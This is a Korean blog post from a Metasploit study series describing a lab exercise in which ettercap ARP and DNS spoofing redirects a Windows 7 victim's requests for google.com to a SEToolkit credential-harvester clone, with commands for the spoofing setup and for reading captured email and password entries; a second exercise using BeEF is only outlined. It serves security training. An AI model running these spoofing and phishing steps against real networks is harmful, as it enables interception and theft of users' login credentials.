본문 바로가기
Learning/└◆Metasploit

metasploit 20. DNS + ARP Spoofing + Fake Web site

Gopzero 2017. 1. 6. 21:07

***************************************************************************************

[실습] Fake Site 구성(제한 시간: 30)

 

DNS Spoofing/Arp Spoofing : ettercap

+

Fake Web Site : SETookit(실습2)

+

문자메세지/메일 보내기: SETookit

 

(실습 시스템)

Victim system : windows 7(192.168.20.202)

Attack system : KaliLinux(192.168.20.50)

Router : firewall.example.com(192.168.20.100)

 

(windows 7 system) 결과 확인

http://www.google.com -> http://192.168.20.50/(악성코드)

***************************************************************************************

ettercap을 이용한 fairewall, Window7 ARP/DNS Spoofing 

setoolkit을 이용한 Fake Web 사이트 구성, ID/Password 정보 수집 테스트


<Kali Linux>


사전 확인

# echo 1 > /proc/sys/net/ipv4/ip_forward

# cat /proc/sys/net/ipv4/ip_forward

1


# vi /etc/ettercap/etter.dns

www.google.com    A 192.168.20.50

www.google.com    PTR 192.168.20.50


ettercap 실행

# ettercap -G &

Sniff -> Unified sniffing -> Network Interface : eth1

Hosts -> Scan for hosts

Hosts -> Host List 

192.168.20.100 -> Add to Target 1

192.168.20.202 -> Add to Target 2

Mitm -> ARP poisoning -> Sniffi remote connections 

Plugins -> Manage the plugins -> dns_spoof

Start -> Start sniffing


Fake Web 사이트 구성

# setoolkit

Social-Engineering Attacks

Website Attack Vectors

Credential Harvester Attack Method

Web Templates

set:webattack > 1

.... > 192.168.20.50

Google

<ENTER>

exit


# cd /var/www/html ; ls


<Window7>

firefox -> http://www.google.com 접속 및 로그인(Fake Site)


<Kali Linux>

# cd /var/www/html ; ls

# cat harvester_*.txt | egrep '(Email|Passwd)'

[Email] abc@test.com

[Passwd] abc123




***************************************************************************************

[실습] Fake Site 구성2(제한 시간: 30)

DNS Spoofing/Arp Spoofing : ettercap

+

Fake Web Site : BeEF 직접작업

 

(실습 시스템)

Victim system : windows 7(192.168.20.202)

Attack system : KaliLinux(192.168.20.50)

Router : firewall.example.com(192.168.20.100)

 

(windows 7 system) 결과 확인

http://www.adobe.com -> http://192.168.20.50/(악성코드)

***************************************************************************************

 










저작자표시 비영리 변경금지

'Learning > └◆Metasploit' 카테고리의 다른 글

Metasploitable V2 Linux 서버의 취약점(NFS)  (0) 2017.01.09
Metasploitable V2 Linux 서버의 취약점(rhosts)  (0) 2017.01.09
metasploit 19. Fake Update Site 구축  (0) 2017.01.06
metasploit 18. BeFF + MSF 브라우저 해킹 원격 쉘 얻기  (0) 2017.01.06

'Learning/└◆Metasploit' Related Articles

티스토리툴바